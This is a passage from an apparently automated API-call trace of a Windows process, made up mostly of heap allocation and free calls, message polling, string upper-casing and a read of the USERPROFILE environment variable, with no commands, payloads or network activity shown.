hHeap=0x2af0000) returned 1 [0222.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0222.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0222.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0222.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0222.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0222.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0222.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0222.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0222.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0222.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0222.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0222.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0222.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0222.032] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0222.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0222.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0222.032] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0222.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0222.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0222.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0222.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b78 [0222.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0222.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0222.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0222.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0222.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0222.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0222.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0222.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0222.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0222.033] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0222.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0222.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0b0 [0222.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0222.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf48 [0222.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0222.033] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0222.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0222.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0222.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0222.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0222.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0222.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0222.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0222.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0222.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0222.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0222.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0222.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0222.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854830 [0222.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0222.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0222.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0222.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0222.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0222.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0222.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0222.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0222.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0222.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0222.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a28 [0222.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0222.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0222.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0222.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0222.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0222.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0222.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0222.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0222.035] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0222.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0222.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0222.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf18 [0222.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0222.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0222.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab110 [0222.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0222.036] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0222.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0222.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0222.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0222.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0222.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0222.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0222.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0222.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0222.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0222.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0222.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0222.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0222.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0222.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0222.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0222.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854290 [0222.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0222.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0222.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0222.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0222.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0222.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0222.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0222.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b98 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0222.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719e8 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0222.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0b0 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0222.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0222.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0222.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0222.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0222.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0222.038] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0222.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0222.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0222.038] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0222.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0222.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0222.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0222.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0222.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0222.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0222.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0222.039] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0222.039] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0222.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0222.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0222.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0222.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0222.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0222.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0222.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0222.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0222.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0222.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0222.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0222.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0222.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0222.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0222.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0222.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0222.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0222.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0222.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0222.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0222.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0222.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0222.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0222.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0222.040] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0222.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0222.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0222.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0222.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0222.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0222.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0222.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0222.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0222.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0222.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0222.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0222.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0222.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0222.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0222.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0222.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0222.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0222.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0222.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0222.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0222.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0222.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0222.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0222.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0222.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0222.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0222.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0222.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0222.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0222.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0222.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0222.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0222.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0222.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0222.041] RtlAllocateHeap 